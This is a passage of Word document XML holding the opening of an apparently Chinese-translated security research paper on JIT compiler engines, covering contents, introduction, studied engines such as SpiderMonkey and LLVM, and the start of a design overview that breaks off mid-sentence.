    <w:p w14:paraId="5A78AA62" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="16"/>
        <w:ind w:left="520"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark21" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>工具类</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="622D4A3D" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="27" w:line="266" w:lineRule="auto"/>
        <w:ind w:left="880" w:right="6639"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark22" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>调试和跟踪模糊</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark22" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark22" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark22" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark22" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark23" w:history="1"/>
    </w:p>
    <w:p w14:paraId="7E8601CA" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:line="251" w:lineRule="exact"/>
        <w:ind w:left="1240"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark24" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>JavaScrip</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark24" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>t模</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark24" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>糊测试</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="75FF9758" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="7" w:line="266" w:lineRule="auto"/>
        <w:ind w:left="1240" w:right="4537"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark25" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>LLV</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark25" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>M</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark25" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>语言运行时模糊</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark25" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>Ru</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark25" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>binius</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark25" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>模糊</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark25" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark26" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark26" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark26" w:history="1"/>
    </w:p>
    <w:p w14:paraId="695DF9A3" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:line="251" w:lineRule="exact"/>
        <w:ind w:left="520"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000099"/>
          <w:u w:val="single" w:color="000099"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>结论与未来方向</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553EC6FE" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:spacing w:line="251" w:lineRule="exact"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="0026102A">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1360" w:right="1020" w:bottom="280" w:left="1280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6464E3E0" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="62"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>介绍</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D86EDE8" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="38"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C61957B" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1" w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="595"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Web浏览器托管我们每天使用的大多数应用程序。虽然方便，但这些应用程序主要是用JavaScript编写的，因此通常比编译为本机代码的同类应用程序慢。为了帮助缓解此问题，浏览器已在其已经很复杂的代码库中实现了即时执行引擎（JIT）。 “及时”对于需要非常有趣且复杂的体系结构的过程而言，并不是恰当的描述。 JIT引擎的核心是从编译器前端获取中间表示（IR），并生成机器代码（例如x86或ARM）并即时执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B04C01" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04607E4F" w14:textId="3B85A31A" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="283" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="449"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>由于JIT不会尝试解析代码或提供</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>运行时库支持</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">，因此通常将前端引擎和一组库与JIT结合使用，以创建IR并为代码在其中执行提供环境。 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>编译器前端</w:t>
      </w:r>
      <w:r>
        <w:t>可以解析原始语言语法（例如ECMAScript）（其中JavaScript，ActionScript和JScript是常见的方言），并生成</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>生成本机代码</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>所需的IR。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DA5C2B" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="480E8B54" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="407"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>浏览器并不是唯一受益于JIT引擎的应用程序</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">。 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Rubinius（Ruby）和Unladen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Swallow（Python）等项目已开始使用JIT引擎来加快动态语言的执行速度</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">。 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Java虚拟机使用JIT来提高性能，Microsoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NET公共语言运行时也是如此</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这种趋势可能只会持续下去，因此，应用程序开发人员和最终用户应该熟悉JIT引擎引入的潜在安全风险。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7103E7B6" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DDD14EC" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="368"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">我们的研究集中在3个前端编译器和后端JIT引擎上，这些研究很少或根本没有公共安全方面的研究。我们探索了在Web浏览器和语言运行时等应用程序中使用JIT引擎的潜在安全影响，并描述了我们为安全研究人员开发的，基于我们的JIT研究开发的工具。我们还将讨论在Firefox </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SpiderMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>前端中发现的一个安全漏洞的案例研究，并讨论如何使用后端</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JaegerMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> JIT来利用此漏洞。最后，我们将以讨论来强化适用于浏览器和语言运行时JIT引擎的JIT实现的可能技术作为结尾。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65787979" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59D90BB2" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_bookmark0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>目标</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A2855A" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53E2B7CB" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="449"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>我们的研究工作集中在过去安全</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>界尚未</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>广泛研究的JIT。 JIT引擎的总体架构非常复杂，包括前端语法解析器</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3BB1C861" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="0026102A">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1360" w:right="1020" w:bottom="280" w:left="1280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E60FEB7" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:line="295" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="835"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>中间表示（IR）编译器，用于后端本机代码生成。我们的研究集中在以下JIT组件上：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A188546" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79BDC39D" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="959"/>
          <w:tab w:val="left" w:pos="960"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Mozilla </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SpiderMonkey前端</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0006618A" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1679"/>
          <w:tab w:val="left" w:pos="1680"/>
        </w:tabs>
        <w:spacing w:before="43"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Mozilla </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>JaegerMonkey和Nitro后端</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0FD89638" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1679"/>
          <w:tab w:val="left" w:pos="1680"/>
        </w:tabs>
        <w:spacing w:before="43"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Mozilla </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>TraceMonkey和NanoJIT后端</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0307A6D5" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="959"/>
          <w:tab w:val="left" w:pos="960"/>
        </w:tabs>
        <w:spacing w:before="43"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>LLVM</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>位</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>码解析</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>器，其JIT引擎以及嵌入它们的应用程序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5797FB42" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:sz w:val="34"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C8EFE5E" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_bookmark1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JIT设计概述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C1504A" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="38"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5731EF56" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="515"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>尽管所有JIT引擎的目标基本相同，但是它们的方法却有所不同。中间表示优化，机器代码发布和代码重写是昂贵的过程，因此确保代码发布的成本不会超过创建本机代码的性能优势非常重要。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B7A8E2" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DD6BC7E" w14:textId="52415A0B" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="595"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在这种程度上，不同的引擎在代码生成方面遵循不同的策略，这些策略可以大致分为以下两种类型：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>tracing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Method</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Method</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> JIT始终为到达的每个代码块（或方法）</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>本机代码</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，并动态更新引用。在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>tracing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> JIT下，将为每个方法调用保留命中计数，并且仅当某个特定的块或方法被视为“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>hot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>就是命中次数多的意思</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)时才发出本机代码。这试图减少很少调用的代码的多余</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，例如初始化例程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620A182B" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="384E2720" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1" w:line="283" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="439"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>我们调查的每个引擎中都有几个体系结构组件。尽管每个JIT引擎都会以不同的方式实现它们，但是这些组件通常总是以某种形式存在。其中包括：用于分配和跟踪在何处编写本机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>代码的内存管</w:t>
